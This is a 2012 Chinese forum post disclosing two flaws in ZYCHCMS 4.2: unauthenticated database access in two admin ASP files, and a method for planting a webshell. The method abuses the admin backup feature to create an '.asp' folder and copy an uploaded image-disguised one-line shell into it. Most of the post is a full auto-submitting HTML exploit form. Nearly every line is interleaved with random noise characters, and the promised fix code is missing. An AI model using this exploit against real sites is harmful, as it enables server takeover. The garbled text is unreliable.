; {! _" ^3 U& I" S$ v
# L" B% o5 o- }! r9 _
1 z1 ~$ x u' X3 Y8 G- m. x
: | ^- f! u: n& _ X# Y4 P. G影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
; X8 \ `" \7 n) O ①SQL注射漏洞' U; Z" j- w( L& g
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp/ Q5 B4 c3 l. }) {
漏洞原因:未过滤# P+ A4 X4 T5 w' ?
漏洞代码:
# |( q4 C4 D8 W z4 C" y 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
, y" Q8 j# T0 r0 L/ I 修复方法:在文件开头加入代码: }. Y7 s- Q+ A4 z5 X) B
" K8 A) H. ^2 p& O8 @; n' x- h
* m9 U2 Y G0 ^) x) ?②后台拿WBSHELL: u, m- f. c; @% m% m% o* T
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
; D4 R) L3 @% A) ?" u4 ~. c$ C6 ^; s 这里在网上找了一个,改了下,将就着用。
% j+ P) A/ U3 j: c" ^ 以下是代码本地提交代码; B& k: K9 T/ t! K% R
; C0 l; z. y& g
" M, H; V+ Y( `0 Y: A: f, X<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
. m! d( u& ^$ K% W <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
. k/ D1 q7 P7 G <tr>) Q5 K5 w% D" U" C% A+ t- z/ n
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>1 ?& _* X9 [% @& R
</tr>
& p2 F0 G3 I% p6 b" @7 `, S <tr>4 I% P4 `6 I0 ?1 H
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>9 W( M0 h {7 Q( e& w6 b
</span>
2 V' O/ a0 ~' X0 l9 t <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
1 M. F! w4 w# [8 D" J# q3 O6 m q <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
5 N& B; {6 ~) A$ z <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>* c$ j+ v l/ X* K; P- A
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d( X! P+ ~8 [0 L Z
<div align=”left”>2 K) J9 j2 [2 I/ g. i1 i
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
) _# \8 k6 L: Q <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
1 B, t) j* \% G9 C <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />: C0 I7 x4 E; P- A& R9 n+ r2 B
</div></td>
& J. @! e, s$ X9 V1 F# H8 I1 ~ </tr>0 @0 ]$ o6 s$ w* H% B$ D
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>( Q; j$ Q, T1 [9 x5 n
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>* \! Y0 W' h3 L( z& F9 s2 X9 t
<td class=”td”><div align=”left”>' `# i/ | j" ^/ q9 s3 T
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
! S% u- m8 P" r. E+ F [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>( D3 R( r6 v; Y
</tr>
$ u- o% q$ S, M; Q1 x1 y <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
7 O4 R+ A/ A7 v" I/ ]- W <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
9 [$ v$ `% O f1 r0 o' e9 N0 Y <td class=”td”><div align=”left”>
) i- ^& ?' Z' L6 t1 l, h0 z <input type=”submit” value=”确定备份” class=”btn”
+ \9 P0 A! g" _+ \3 j </div></td>9 F) O# c5 _" L
</tr>
+ t5 E: d3 `5 g. E </table></td></tr></form>( k% h9 N5 ]* S% t- Y0 ~; N3 I
</table>7 o/ R- @) v. J1 S/ n: p* R
</td>% f% y6 [2 u4 r2 n, s
</tr>
6 F. r! m( [! H9 u3 c </table>
) ~$ E5 H8 U Q" W$ _ <script>
% j) e: F4 c$ q# W4 n document.all.add.submit();
, w# l1 X4 _5 j </script>. M. f8 e! s7 c: u7 ^4 c4 [, S
! }/ {: H" T; g c9 d
: J8 m) C4 M3 X8 l/ V% u
: n: b0 G3 j2 c, J* Y
7 F. g, p# _" y, ?4 o- e
5 S: j1 V+ N1 [% a& e* J% m* r7 w: i8 h( { p
, x2 j7 w9 L, C4 k! m$ o' S
6 X# K: U) f- e
% |: y" {1 f5 C* \3 w
; a5 ]- T8 j* ]6 x9 o. e1 ] |
发表于 2012-9-10 21:09:51
收藏
支持
反对